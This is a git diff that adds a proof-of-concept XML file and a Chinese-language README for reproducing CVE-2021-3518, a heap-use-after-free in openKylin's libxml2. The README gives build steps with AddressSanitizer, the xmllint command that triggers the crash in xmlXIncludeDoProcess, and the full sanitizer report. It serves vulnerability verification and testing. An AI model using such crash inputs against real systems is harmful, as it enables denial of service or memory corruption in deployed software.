diff --git a/cve/libxml2/2021/CVE-2021-3518/CVE-2021-3518-poc b/cve/libxml2/2021/CVE-2021-3518/CVE-2021-3518-poc
new file mode 100644
index 0000000000000000000000000000000000000000..23f24f27d04e18111d3e585192e882f3a2f34aa3
--- /dev/null
+++ b/cve/libxml2/2021/CVE-2021-3518/CVE-2021-3518-poc
@@ -0,0 +1,7 @@
+<?xml version='1.0' encoding='ISO-8859-5' standalone='no'?>
+
+<!DOCTYPE spec SYSTEM "dtds/spec.dtd" [
+<!ENTITY draft.month 'February'>
+]>
+
+<month>&draft.month;</month>
\ No newline at end of file
diff --git a/cve/libxml2/2021/CVE-2021-3518/README.md b/cve/libxml2/2021/CVE-2021-3518/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..d98097843504926d9221bbfc491f01429ccdf5d0
--- /dev/null
+++ b/cve/libxml2/2021/CVE-2021-3518/README.md
@@ -0,0 +1,93 @@
+## 漏洞验证
+### 下载源码  
+https://gitee.com/openkylin/libxml2 (版本：2.9.10+dfsg-ok1)
+
+### 编译
+```bash
+$ cd libxml2
+#下载编译依赖
+$ sudo apt install  libicu-dev liblzma-dev  libpython3-all-dbg libpython3-all-dev pkg-config  python3-all-dbg python3-all-dev rename zlib1g-dev
+#开启-ggdb -fsanitize=address
+$ CFLAGS="-ggdb -fsanitize=address" ./configure
+#编译
+$ make
+```
+
+### 漏洞复现
+```bash
+$ ./xmllint --recover --dropdtd --nofixup-base-uris ../CVE/CVE-2021-3518-poc
+=================================================================
+==17810==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d000000048 at pc 0x7f9e25e7bbaf bp 0x7ffe68ab7bd0 sp 0x7ffe68ab7bc0
+READ of size 4 at 0x60d000000048 thread T0
+    #0 0x7f9e25e7bbae in xmlXIncludeDoProcess /data1/libxml2-openkylin-yangtze/xinclude.c:2400
+    #1 0x7f9e25e7c333 in xmlXIncludeProcessTreeFlagsData__internal_alias /data1/libxml2-openkylin-yangtze/xinclude.c:2503
+    #2 0x7f9e25e7c3ea in xmlXIncludeProcessFlagsData__internal_alias /data1/libxml2-openkylin-yangtze/xinclude.c:2532
+    #3 0x7f9e25e7c415 in xmlXIncludeProcessFlags__internal_alias /data1/libxml2-openkylin-yangtze/xinclude.c:2547
+    #4 0x561f0568ebcb in parseAndPrintFile /data1/libxml2-openkylin-yangtze/xmllint.c:2423
+    #5 0x561f05696cba in main /data1/libxml2-openkylin-yangtze/xmllint.c:3728
+    #6 0x7f9e25a730b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
+    #7 0x561f05686aed in _start (/data1/libxml2-openkylin-yangtze/.libs/xmllint+0xfaed)
+
+0x60d000000048 is located 8 bytes inside of 136-byte region [0x60d000000040,0x60d0000000c8)
+freed by thread T0 here:
+    #0 0x7f9e2620f7cf in __interceptor_free (/lib/x86_64-linux-gnu/libasan.so.5+0x10d7cf)
+    #1 0x7f9e25ccc808 in xmlFreeEntity /data1/libxml2-openkylin-yangtze/entities.c:145
+    #2 0x7f9e25cd0662 in xmlFreeEntityWrapper /data1/libxml2-openkylin-yangtze/entities.c:890
+    #3 0x7f9e25d8e2a2 in xmlHashFree__internal_alias /data1/libxml2-openkylin-yangtze/hash.c:346
+    #4 0x7f9e25cd0688 in xmlFreeEntitiesTable__internal_alias /data1/libxml2-openkylin-yangtze/entities.c:901
+    #5 0x7f9e25d65a11 in xmlFreeDtd__internal_alias /data1/libxml2-openkylin-yangtze/tree.c:1146
+    #6 0x561f0568eb91 in parseAndPrintFile /data1/libxml2-openkylin-yangtze/xmllint.c:2414
+    #7 0x561f05696cba in main /data1/libxml2-openkylin-yangtze/xmllint.c:3728
+    #8 0x7f9e25a730b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
+
+previously allocated by thread T0 here:
+    #0 0x7f9e2620fbc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
+    #1 0x7f9e25ccc865 in xmlCreateEntity /data1/libxml2-openkylin-yangtze/entities.c:159
+    #2 0x7f9e25cccfd7 in xmlAddEntity /data1/libxml2-openkylin-yangtze/entities.c:241
+    #3 0x7f9e25ccd548 in xmlAddDocEntity__internal_alias /data1/libxml2-openkylin-yangtze/entities.c:372
+    #4 0x7f9e25fcfe5f in xmlSAX2EntityDecl__internal_alias /data1/libxml2-openkylin-yangtze/SAX2.c:677
+    #5 0x7f9e25d13253 in xmlParseEntityDecl__internal_alias /data1/libxml2-openkylin-yangtze/parser.c:5458
+    #6 0x7f9e25d224a7 in xmlParseMarkupDecl__internal_alias /data1/libxml2-openkylin-yangtze/parser.c:6813
+    #7 0x7f9e25d2c433 in xmlParseInternalSubset /data1/libxml2-openkylin-yangtze/parser.c:8300
+    #8 0x7f9e25d42e8f in xmlParseDocument__internal_alias /data1/libxml2-openkylin-yangtze/parser.c:10716
+    #9 0x7f9e25d5fdcb in xmlDoRead /data1/libxml2-openkylin-yangtze/parser.c:15221
+    #10 0x7f9e25d5ffdf in xmlReadFile__internal_alias /data1/libxml2-openkylin-yangtze/parser.c:15283
+    #11 0x561f0568eb01 in parseAndPrintFile /data1/libxml2-openkylin-yangtze/xmllint.c:2388
+    #12 0x561f05696cba in main /data1/libxml2-openkylin-yangtze/xmllint.c:3728
+    #13 0x7f9e25a730b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
+
+SUMMARY: AddressSanitizer: heap-use-after-free /data1/libxml2-openkylin-yangtze/xinclude.c:2400 in xmlXIncludeDoProcess
+Shadow bytes around the buggy address:
+  0x0c1a7fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c1a7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c1a7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c1a7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c1a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c1a7fff8000: fa fa fa fa fa fa fa fa fd[fd]fd fd fd fd fd fd
+  0x0c1a7fff8010: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
+  0x0c1a7fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c1a7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c1a7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c1a7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==17810==ABORTING
+```
\ No newline at end of file